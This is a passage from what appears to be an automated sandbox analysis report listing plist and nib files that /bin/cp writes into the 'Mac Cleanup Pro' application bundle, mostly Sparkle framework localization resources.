Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUModelTranslation.plistJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nibJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nibJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Info.plistJump to dropped file
Source: /bin/cp (PID: 806)XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/com.pcv.hlprmcp.plistJump to dropped file
Source: /bin/cp (PID: 806)Binary plist file created: /Applications/Mac Cleanu